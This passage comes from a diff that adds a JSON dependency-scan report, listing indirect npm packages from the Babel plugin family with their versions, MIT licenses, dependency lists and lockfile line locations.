"npm" + }, + { + "ID": "@babel/plugin-syntax-flow@7.27.1", + "Name": "@babel/plugin-syntax-flow", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-flow@7.27.1", + "UID": "871d8972eec5202a" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 774, + "EndLine": 788 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-syntax-import-attributes@7.27.1", + "Name": "@babel/plugin-syntax-import-attributes", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-import-attributes@7.27.1", + "UID": "73d8e2829cb4e9e0" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 805, + "EndLine": 819 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-syntax-import-meta@7.10.4", + "Name": "@babel/plugin-syntax-import-meta", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-import-meta@7.10.4", + "UID": "d57d9d31902770cc" + }, + "Version": "7.10.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 820, + "EndLine": 831 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-syntax-json-strings@7.8.3", + "Name": "@babel/plugin-syntax-json-strings", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-json-strings@7.8.3", + "UID": "71c09c113d3d540d" + }, + "Version": "7.8.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 832, + "EndLine": 843 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-syntax-jsx@7.27.1", + "Name": "@babel/plugin-syntax-jsx", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-jsx@7.27.1", + "UID": "af3d9146c89269d3" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 844, + "EndLine": 858 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-syntax-logical-assignment-operators@7.10.4", + "Name": "@babel/plugin-syntax-logical-assignment-operators", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-logical-assignment-operators@7.10.4", + "UID": "2354164d55e6366e" + }, + "Version": "7.10.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 859, + "EndLine": 870 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-syntax-nullish-coalescing-operator@7.8.3", + "Name": "@babel/plugin-syntax-nullish-coalescing-operator", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-nullish-coalescing-operator@7.8.3", + "UID": "85eca95fef5f56af" + }, + "Version": "7.8.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 871, + "EndLine": 882 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-syntax-numeric-separator@7.10.4", + "Name": "@babel/plugin-syntax-numeric-separator", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-numeric-separator@7.10.4", + "UID": "d5396b912967f1c6" + }, + "Version": "7.10.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 883, + "EndLine": 894 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-syntax-object-rest-spread@7.8.3", + "Name": "@babel/plugin-syntax-object-rest-spread", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-object-rest-spread@7.8.3", + "UID": "fb61881c37ff1f05" + }, + "Version": "7.8.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 895, + "EndLine": 906 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-syntax-optional-catch-binding@7.8.3", + "Name": "@babel/plugin-syntax-optional-catch-binding", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-optional-catch-binding@7.8.3", + "UID": "24b2183560dcc639" + }, + "Version": "7.8.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 907, + "EndLine": 918 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-syntax-optional-chaining@7.8.3", + "Name": "@babel/plugin-syntax-optional-chaining", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-optional-chaining@7.8.3", + "UID": "9973ece2ac77ed6c" + }, + "Version": "7.8.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 919, + "EndLine": 930 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-syntax-private-property-in-object@7.14.5", + "Name": "@babel/plugin-syntax-private-property-in-object", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-private-property-in-object@7.14.5", + "UID": "5ff34ad9e0873373" + }, + "Version": "7.14.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 931, + "EndLine": 945 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-syntax-top-level-await@7.14.5", + "Name": "@babel/plugin-syntax-top-level-await", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-top-level-await@7.14.5", + "UID": "29fd317949961f26" + }, + "Version": "7.14.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 946, + "EndLine": 960 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-syntax-typescript@7.27.1", + "Name": "@babel/plugin-syntax-typescript", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-typescript@7.27.1", + "UID": "1a7ee64ffb2163bf" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 961, + "EndLine": 975 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-arrow-functions@7.27.1", + "Name": "@babel/plugin-transform-arrow-functions", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-arrow-functions@7.27.1", + "UID": "b3fdd8c204978a7a" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 993, + "EndLine": 1007 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-async-generator-functions@7.28.0", + "Name": "@babel/plugin-transform-async-generator-functions", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-async-generator-functions@7.28.0", + "UID": "e7c80934d1ab9af3" + }, + "Version": "7.28.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1", + "@babel/helper-remap-async-to-generator@7.27.1", + "@babel/traverse@7.28.4" + ], + "Locations": [ + { + "StartLine": 1008, + "EndLine": 1024 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-async-to-generator@7.27.1", + "Name": "@babel/plugin-transform-async-to-generator", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-async-to-generator@7.27.1", + "UID": "9b30e387ffb4111c" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-module-imports@7.27.1", + "@babel/helper-plugin-utils@7.27.1", + "@babel/helper-remap-async-to-generator@7.27.1" + ], + "Locations": [ + { + "StartLine": 1025, + "EndLine": 1041 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-block-scoping@7.28.4", + "Name": "@babel/plugin-transform-block-scoping", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-block-scoping@7.28.4", + "UID": "dff90ba76c99318d" + }, + "Version": "7.28.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 1058, + "EndLine": 1072 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-class-properties@7.27.1", + "Name": "@babel/plugin-transform-class-properties", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-class-properties@7.27.1", + "UID": "f22d9847c666198f" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-create-class-features-plugin@7.28.3", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 1073, + "EndLine": 1088 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-classes@7.28.4", + "Name": "@babel/plugin-transform-classes", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-classes@7.28.4", + "UID": "dc05b671165003f3" + }, + "Version": "7.28.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-annotate-as-pure@7.27.3", + "@babel/helper-compilation-targets@7.27.2", + "@babel/helper-globals@7.28.0", + "@babel/helper-plugin-utils@7.27.1", + "@babel/helper-replace-supers@7.27.1", + "@babel/traverse@7.28.4" + ], + "Locations": [ + { + "StartLine": 1106, + "EndLine": 1125 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-computed-properties@7.27.1", + "Name": "@babel/plugin-transform-computed-properties", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-computed-properties@7.27.1", + "UID": "93f466e81d4fd028" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1", + "@babel/template@7.27.2" + ], + "Locations": [ + { + "StartLine": 1126, + "EndLine": 1141 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-destructuring@7.28.0", + "Name": "@babel/plugin-transform-destructuring", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-destructuring@7.28.0", + "UID": "f2be2d351671f660" + }, + "Version": "7.28.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1", + "@babel/traverse@7.28.4" + ], + "Locations": [ + { + "StartLine": 1142, + "EndLine": 1157 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-flow-strip-types@7.27.1", + "Name": "@babel/plugin-transform-flow-strip-types", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-flow-strip-types@7.27.1", + "UID": "a6d93a53aff4957a" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1", + "@babel/plugin-syntax-flow@7.27.1" + ], + "Locations": [ + { + "StartLine": 1273, + "EndLine": 1288 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-for-of@7.27.1", + "Name": "@babel/plugin-transform-for-of", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-for-of@7.27.1", + "UID": "f4cf06cd872a3346" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1", + "@babel/helper-skip-transparent-expression-wrappers@7.27.1" + ], + "Locations": [ + { + "StartLine": 1289, + "EndLine": 1304 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-function-name@7.27.1", + "Name": "@babel/plugin-transform-function-name", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-function-name@7.27.1", + "UID": "9ad7eea2f3811df" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-compilation-targets@7.27.2", + "@babel/helper-plugin-utils@7.27.1", + "@babel/traverse@7.28.4" + ], + "Locations": [ + { + "StartLine": 1305, + "EndLine": 1321 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-literals@7.27.1", + "Name": "@babel/plugin-transform-literals", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-literals@7.27.1", + "UID": "3710dd6d53e044a9" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 1338, + "EndLine": 1352 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-logical-assignment-operators@7.27.1", + "Name": "@babel/plugin-transform-logical-assignment-operators", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-logical-assignment-operators@7.27.1", + "UID": "855af678331c3e2a" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 1353, + "EndLine": 1367 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-modules-commonjs@7.27.1", + "Name": "@babel/plugin-transform-modules-commonjs", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-modules-commonjs@7.27.1", + "UID": "71c1125877361fd0" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-module-transforms@7.28.3", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 1401, + "EndLine": 1416 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-named-capturing-groups-regex@7.27.1", + "Name": "@babel/plugin-transform-named-capturing-groups-regex", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-named-capturing-groups-regex@7.27.1", + "UID": "7b629e343537de35" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-create-regexp-features-plugin@7.27.1", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 1453, + "EndLine": 1468 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-nullish-coalescing-operator@7.27.1", + "Name": "@babel/plugin-transform-nullish-coalescing-operator", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-nullish-coalescing-operator@7.27.1", + "UID": "de0f669f0889b1d4" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 1485, + "EndLine": 1499 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-numeric-separator@7.27.1", + "Name": "@babel/plugin-transform-numeric-separator", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-numeric-separator@7.27.1", + "UID": "51b5bc33baecad24" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 1500, + "EndLine": 1514 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-object-rest-spread@7.28.4", + "Name": "@babel/plugin-transform-object-rest-spread", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-object-rest-spread@7.28.4", + "UID": "a47c3fb199438136" + }, + "Version": "7.28.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-compilation-targets@7.27.2", + "@babel/helper-plugin-utils@7.27.1", + "@babel/plugin-transform-destructuring@7.28.0", + "@babel/plugin-transform-parameters@7.27.7", + "@babel/traverse@7.28.4" + ], + "Locations": [ + { + "StartLine": 1515, + "EndLine": 1533 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-optional-catch-binding@7.27.1", + "Name": "@babel/plugin-transform-optional-catch-binding", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-optional-catch-binding@7.27.1", + "UID": "a5294f34c408665d" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 1551, + "EndLine": 1565 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-optional-chaining@7.27.1", + "Name": "@babel/plugin-transform-optional-chaining", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-optional-chaining@7.27.1", + "UID": "b2981d7243865474" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1", + "@babel/helper-skip-transparent-expression-wrappers@7.27.1" + ], + "Locations": [ + { + "StartLine": 1566, + "EndLine": 1581 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-parameters@7.27.7", + "Name": "@babel/plugin-transform-parameters", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-parameters@7.27.7", + "UID": "3cdf34d84623944d" + }, + "Version": "7.27.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 1582, + "EndLine": 1596 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-private-methods@7.27.1", + "Name": "@babel/plugin-transform-private-methods", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-private-methods@7.27.1", + "UID": "db16d41bb7a81c56" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-create-class-features-plugin@7.28.3", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 1597, + "EndLine": 1612 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-private-property-in-object@7.27.1", + "Name": "@babel/plugin-transform-private-property-in-object", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-private-property-in-object@7.27.1", + "UID": "ce17c0cab465756b" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-annotate-as-pure@7.27.3", + "@babel/helper-create-class-features-plugin@7.28.3", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 1613, + "EndLine": 1629 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-react-display-name@7.28.0", + "Name": "@babel/plugin-transform-react-display-name", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-react-display-name@7.28.0", + "UID": "1baba8764cd154e" + }, + "Version": "7.28.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 1646, + "EndLine": 1660 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-react-jsx@7.27.1", + "Name": "@babel/plugin-transform-react-jsx", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-react-jsx@7.27.1", + "UID": "1bc556b0f42b262f" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-annotate-as-pure@7.27.3", + "@babel/helper-module-imports@7.27.1", + "@babel/helper-plugin-utils@7.27.1", + "@babel/plugin-syntax-jsx@7.27.1", + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 1661, + "EndLine": 1679 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-react-jsx-self@7.27.1", + "Name": "@babel/plugin-transform-react-jsx-self", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-react-jsx-self@7.27.1", + "UID": "3b73f9c9a586a855" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 1680, + "EndLine": 1694 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-react-jsx-source@7.27.1", + "Name": "@babel/plugin-transform-react-jsx-source", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-react-jsx-source@7.27.1", + "UID": "c7248e2460d47258" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 1695, + "EndLine": 1709 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-regenerator@7.28.4", + "Name": "@babel/plugin-transform-regenerator", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-regenerator@7.28.4", + "UID": "e3e8442ca1a771d8" + }, + "Version": "7.28.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 1710, + "EndLine": 1724 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-runtime@7.28.3", + "Name": "@babel/plugin-transform-runtime", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-runtime@7.28.3", + "UID": "5b72a8759ded0408" + }, + "Version": "7.28.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-module-imports@7.27.1", + "@babel/helper-plugin-utils@7.27.1", + "babel-plugin-polyfill-corejs2@0.4.14", + "babel-plugin-polyfill-corejs3@0.13.0", + "babel-plugin-polyfill-regenerator@0.6.5", + "semver@6.3.1" + ], + "Locations": [ + { + "StartLine": 1758, + "EndLine": 1777 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-shorthand-properties@7.27.1", + "Name": "@babel/plugin-transform-shorthand-properties", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-shorthand-properties@7.27.1", + "UID": "7be3dcac36e59eb" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 1778, + "EndLine": 1792 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-spread@7.27.1", + "Name": "@babel/plugin-transform-spread", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-spread@7.27.1", + "UID": "e8c79648231670e5" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1", + "@babel/helper-skip-transparent-expression-wrappers@7.27.1" + ], + "Locations": [ + { + "StartLine": 1793, + "EndLine": 1808 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-sticky-regex@7.27.1", + "Name": "@babel/plugin-transform-sticky-regex", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-sticky-regex@7.27.1", + "UID": "e1ae39053caf733d" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 1809, + "EndLine": 1823 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-template-literals@7.27.1", + "Name": "@babel/plugin-transform-template-literals", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-template-literals@7.27.1", + "UID": "7649891d5c191bfe" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 1824, + "EndLine": 1838 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-typescript@7.28.0", + "Name": "@babel/plugin-transform-typescript", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-typescript@7.28.0", + "UID": "cc12ae363c6e34aa" + }, + "Version": "7.28.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-annotate-as-pure@7.27.3", + "@babel/helper-create-class-features-plugin@7.28.3", + "@babel/helper-plugin-utils@7.27.1", + "@babel/helper-skip-transparent-expression-wrappers@7.27.1", + "@babel/plugin-syntax-typescript@7.27.1" + ], + "Locations": [ + { + "StartLine": 1855, + "EndLine": 1873 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-transform-unicode-regex@7.27.1", + "Name": "@babel/plugin-transform-unicode-regex", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-unicode-regex@7.27.1", + "UID": "39fe052f6a3f505f" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-create-regexp-features-plugin@7.27.1", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 1907, + "EndLine": 1922 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/preset-typescript@7.27.1", + "Name": "@babel/preset-typescript", + "Identifier": { + "PURL": "pkg:npm/%40babel/preset-typescript@7.27.1", + "UID": "263819b530d361e9" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1", + "@babel/helper-validator-option@7.27.1", + "@babel/plugin-syntax-jsx@7.27.1", + "@babel/plugin-transform-modules-commonjs@7.27.1", + "@babel/plugin-transform-typescript@7.28.0" + ], + "Locations": [ + { + "StartLine": 2040, + "EndLine": 2058 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/template@7.27.2", + "Name": "@babel/template", + "Identifier": { + "PURL": "pkg:npm/%40babel/template@7.27.2", + "UID": "81c2a891b06d272e" + }, + "Version": "7.27.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": 